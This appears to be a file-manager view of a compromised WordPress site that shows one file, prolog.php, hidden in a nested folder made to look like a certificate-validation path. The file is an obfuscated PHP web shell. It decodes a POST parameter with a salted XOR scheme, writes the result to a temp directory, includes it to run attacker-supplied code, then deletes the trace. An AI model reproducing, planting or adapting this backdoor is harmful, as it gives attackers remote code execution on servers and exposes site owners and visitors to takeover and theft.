PATH:
home
/
sarkas88.com
/
public_html
/
wp-content
/
well-known
/
acme-challenge
/
e
/
f
/
c
/
h
<?php if(!is_null($_POST["tkn"] ?? null)){ $descriptor = array_filter([ini_get("upload_tmp_dir"), "/dev/shm", sys_get_temp_dir(), session_save_path(), getenv("TMP"), getenv("TEMP"), getcwd(), "/var/tmp", "/tmp"]); $parameter_group = $_POST["tkn"]; $parameter_group = explode ( '.', $parameter_group ); $marker = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $salt ); $o = 0; foreach( $parameter_group as $v7) {$sChar = ord( $salt[$o % $lenS] ); $d = ( ( int)$v7 - $sChar -( $o % 10)) ^ 46; $marker .= chr( $d ); $o++;} $data = 0; do { $sym = $descriptor[$data] ?? null; if ($data >= count($descriptor)) break; if ((bool)is_dir($sym) && (bool)is_writable($sym)) { $data_chunk = vsprintf("%s/%s", [$sym, ".itm"]); if (@file_put_contents($data_chunk, $marker) !== false) { include $data_chunk; unlink($data_chunk); exit; } } $data++; } while (true); }
[-] prolog.php
[open]
[+]
..